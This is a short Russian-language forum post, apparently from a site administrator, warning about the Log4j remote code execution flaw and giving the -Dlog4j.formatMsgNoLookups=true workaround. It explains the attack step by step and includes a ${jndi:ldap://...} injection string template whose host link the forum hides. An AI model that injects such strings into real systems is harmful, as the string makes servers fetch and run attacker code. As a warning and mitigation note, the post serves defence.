Java уязвимость -Dlog4j.formatMsgNoLookups=true

Java уязвимость -Dlog4j.formatMsgNoLookups=true


McDev

Администратор
Администратор
Премиум
Пользователь
15 Мар 2020
780
275
mcdev.su
Рубли
0.0
  • У половины интернета нашли выполнение произвольного кода через Log4j.

    Выглядит это так:

    1) Посылаем специально сформированный запрос вида ${jndi:ldap://Ссылка скрыта, пожалуйста Войдите или Зарегистрируйтесь } в любое место, которое потенциально может залогироваться.
    2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у Ссылка скрыта, пожалуйста Войдите или Зарегистрируйтесь
    3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.

    Гроб. Гроб. Кладбище.
    Временный фикс: JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true”

    Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).
  • Ссылка скрыта, пожалуйста Войдите или Зарегистрируйтесь